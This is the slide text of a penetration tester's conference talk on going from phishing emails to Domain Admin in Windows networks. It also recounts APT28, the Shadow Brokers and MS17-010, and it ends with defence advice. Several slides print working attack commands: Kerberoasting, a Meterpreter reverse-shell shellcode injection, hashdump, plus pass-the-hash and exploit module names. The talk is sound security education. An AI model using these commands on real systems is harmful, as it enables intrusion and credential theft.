Part two of the DA trilogy Presented at BSides 2017 London presentation

1. enemies of the west..

3. Aug 2016, shadow brokers claimed to have stolen
"cyber weapons“
Over 8 months they leaked exploits.
April 14 2017. They leaked Microsoft exploits.
MS17-010 (Same impact as MS08-067)

5. And the Criminals…

8. We are at war…

9. “Who am I?”

10. • Neil Lines - Pen Tester
• Involved in a range of security areas.
• Social Engineering (SE) is my favourite!

12. Case one…

13. May 2016 - US looked set to elect there 1st
female president…

14. June 2016, it was
reported that the
networks of the
Democratic National
Committee (DNC)
had been
compromised..

15. No proof of Russian
it is suspected that the
Group known as APT28
government's involvement
Russia-backed hacking
were responsible…

16. A month later, thousands of stolen emails
and attachments were published…
WikiLeaks.

17. The attack was carried out using
phishing emails sent to political
figures.
http://www.nationalcrimeagency.gov.uk - 785-the-cyber-threat-to-uk-business

18. As used by
APT28…

19. Following
It is reported that the DNC replaced its
computer systems, laptops and phones.
The Head of the DNC resigned.

20. Replacing all your computer systems,
laptops and phones, is not a cheap or
easy task..
This act alone shows the fear to such
attacks.

21. History may consider
this hack responsible
for losing an
election…

22. E-mails are now mightier than the
sword…

23. nation-state threats?

24. Russia, China, Iran and North
Korea…

25. WikiLeaks has published more files
today which it claims show the CIA
went to great lengths to disguise its
own hacking attacks and point
the finger at Russia, China, North
Korea and Iran…

27. “Your never be able to prevent all of
them, everything is penetrable
eventually…”
Michael Daniel - Former Special Assistant to the President and Cybersecurity
Coordinator.

28. What are the targets ?

29. • Governments / Politicians
• Medical companies / records
• Manufacturing / Retail
• Energy companies
• Banking

30. APT28 — also known as Fancy Bear…

31. A hacking group linked to
Russia's military has
begun taking aim at
France's presidential
candidate, Emmanuel
Macron…

32. March 15 2017,
domain names "onedrive-en-
marche.fr" and "mail-en-marche.fr”
Were registered by APT28…

33. Quick run down on others
• Ukrainian power supply;
• Yahoo! data breaches;
• the US Democratic Party Hacked;
• $81,000,000 from Bangladesh Bank..

34. To date No single act of
cybercrime has been regarded as
an act of war?

35. Think Nation-State Cyber
threats
What do you think?

36. Very costly;
Massive global attacks;
Highly sophisticated;
The Pro’s…

37. But wait…
Democratic National
Committee
Hacked via an email…

38. “Got me thinking”
• Could a single person accomplished
these hacks;
• Are they sophisticated?
• And what would the costs be?

39. Demo time…

40. remote to internal..

42. And if you click?

43. Vid 1. Email UNC

44. Can you crack The hash?

45. 09/05/2017 - 8 hashes gained
crackstation, hashkiller-dict.txt,
Top125Thousand-probable, custom dictionary
and then again with rules – Reversed zero…
“Rocktastic” - Reversed one…

46. But why not rules??

47. Rules do not
add football teams.
add towns or city names.
add top 1000 male / female names.
And are very slow…

48. https://labs.nettitude.com

49. Another UNC example…

50. Vid 2. UNC Amazing

51. Now for
something
New…

52. Introducing Windows 10 S
Streamlined for security and
superior performance.

53. Microsoft-verified security
Microsoft Edge is your default
browser since it’s more secure
than Chrome or Firefox.

54. 1 According to NSS Labs reports at
https://aka.ms/browser-security

55. NSS Labs conducted independent
global tests measuring how effective
browsers are at protecting against
socially engineered malware (SEM)
and phishing attacks.

56. I downloaded the report...

57. 78,921 results were collected over 360
hours NSS engineers removed samples
that did not pass the validation criteria,
Ultimately, 991 unique URLs were
included in NSS’ final set of phishing
sites.

58. It had 10 pages of stuff and pretty
charts and more stuff

60. moral of the story Edge blocks
bad sites the quickest.
But Is it officiant against
phishing attacks?

61. NSS officially say it’s
the best…

62. Vid 3. Edge

63. Got creds What now?

64. remote to internal…

66. credit where credit is due…
Office 365 2FA
solution is
good…

67. need a shell…

68. Lets not Forget Zero day’s
they 2017 they don’t all
Cost $$$

69. A quick story…

70. NSA – owned a lot
of cool toys…

71. Shadow
Brokers
illegally
took the
toys…

72. They tried to
sell them…

73. No one paid…

74. Shadow Brokers
Released them for
free 14 April 2017…

76. Moral of the story don’t leave
port 445 SMB open from the
outside…

77. Before ETERNALBLUE
Media was raving about CVE-
2017-0199…

78. CVE-2017-0199
Download, execute Visual Basic script
containing PowerShell commands when a
user opens the document…

79. CVE-2017-0199
Bypass enable content

80. Vid 4. CVE-2017-0199

81. Problem is
0 days make headlines
Headlines = AV signatures

82. Functionality over 0 day!
Macro + OLE

83. Vid 5. Marcos
Vid 6. OLE

84. Final point before we go internal…
One word document can contain all of the
following not just one!
Macro,
OLE,
UNC..

85. Macro…
OLE…
UNC…

88. And then they stopped working…

89. The all new singing and dancing
Spam & Virus Blocker
dedicated antispam, antivirus, and
antiphishing security appliance…

90. “make
them come
to you!”
“make
them come
to you!”
@Hagan_23

91. “And I was like…”

92. Meanwhile 30 mins latter…
Vid 7. Make them come to
you

93. With New tricks…
Rocking internals!

94. Have I seen Bloodhound?
Yes…
Have I seen

95. DeathStar – looks cool
it elevates Domain privileges using the
GPP Passwords…
it obtains Domain Admin's credentials
using Mimikatz…

96. DeathStar – looks cool
it elevates Domain privileges using the
GPP Passwords…
it obtains Domain Admin's credentials
using Mimikatz…

97. Until
Microsoft Security Bulletin MS14-
025
windows server 2012

98. learn how to exploit in
many ways!

99. Windows PowerShell
Copyright (C) 2014 Microsoft
Corporation. All rights reserved.
PS C:UsersMYEXPLOIT>

100. Kerberoast…
Tim Medin revealed “Kerberoasting“
To the world.
1. Any user has rights!
2. Targets service accounts.
3. Used to be complex to exploit…

101. Invoke-Kerberoast -OutputFormat HashCat|Select-
Object -ExpandProperty hash
@benpturner and @davehardy20

102. Kerberoast - Using poshc2
1. Email a macro in;
2. Select your implant;
3. Run Invoke-Kerberoast;
4. Get hash;
5. Hashcat + Rocktastic;
6. DA…

103. Kerberos provides secure user
authentication with an industry standard
that permits interoperability.
Kerberos Version 5 added to Win2k – Still
used today.

104. Groups.xml

105. MS14-025: Vulnerability in Group Policy…
1. Any user has rights!
2. DNS Servers . . . : 10.1.20.220
3. 10.1.20.220sysvolNAMEPolicies
4. groups.xml, scheduledtasks.xml, & services.xml
services.xml
5. Microsoft published the AES encryption key on
MSDN

108. If this fails grab a
meterpreter shell…

109. Invoke-Shellcode -Payload
windows/meterpreter/reverse_https -
Lhost 192.168.0.100 -Lport 443 -Force

110. Meterpreter shell – How do I get DA?

111. The Filthy way…

112. Ipconfig /all find DC
MS17-010 the DC (2008)
Congratulations you won…

116. Ms17-010 – Kills things

117. Old school way to DA?

118. Do you have creds?
Yes, great were cooking…
Nope, good luck…

119. Vid 8. SMB Login

120. Local system rights

121. why does this happen?
• Misconfigured services and
shares on local machines are
common.

122. PSExec Time

123. Vid 9. PSEXEC

124. • meterpreter > getsystem
• [-] priv_elevate_getsystem: Opeation failed:
• [-] Named Pipe Impersonation

125. GETsystem fails, cry…

126. Privesc – is an art form…

127. Hit up the exploits
MSF ms14_058_track_popup_menu
MSF ms15_051_client_copy_image
don’t forget UAC Exploits Misconfigured
Services
HarmJ0y/PowerUp

128. meterpreter > getsystem
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b5
1404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

129. Update 101..
Remote access to internal
network…

130. Time to Hunt out
users of interest
(DA)…

131. So why da?
• The keys to the castle.
• Highest privileges on a single domain.
• Access all domain resources.

132. Rule one of DA club…
Nessus, qualys or openvas
wont help!

133. Administrator:500:aad3b435b51404eeaad3b435b51
404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pass the hash still relevant…

134. Microsoft do not salt local hashes.
• “It is difficult to alter the password processing algorithms
without impacting a lot of subsystems and potentially
breaking the backward compatibility, which is the driving
force of the Windows ecosystem.”

136. Criminals catching up - slowly
• 2016 reports of Ransomware starting
to use PTH.

137. No reports of WannaCry
ransomware attack using
PTH?

138. That was a Mistake…

139. How can a pentester user
PTH?

141. Da, DA come out and play …

142. When should a DA
account be used?

143. So you found DA
how do you exploit?

145. Vid 10. Mimikatz

146. Update
Mimikatz don’t play nice on
win 10 and server 2012 or
2016…

147. MSF - lockout_keylogger
POSH - Cred-Popper

148. Common password
choices for da?

149. Recap
• Got external access in
• Got user creds
• Enumerated misconfigurations
• Got DA

150. How can you defend
against this?

151. Defence in depth
(also known as Castle
Approach)

152. “I want to know Who
clicked on it?”

153. People are quick to
blame people…
This is wrong…

154. How did the email get
to the person!

155. Use antiphishing
security
appliances

156. Office
disable macros
enforce protective
mode

157. Restrict outbound
traffic
SMB 445

158. use a siem…

159. Antivirus
Host based IPS
Host based FW

160. Then educate your
people…

161. @myexploit2600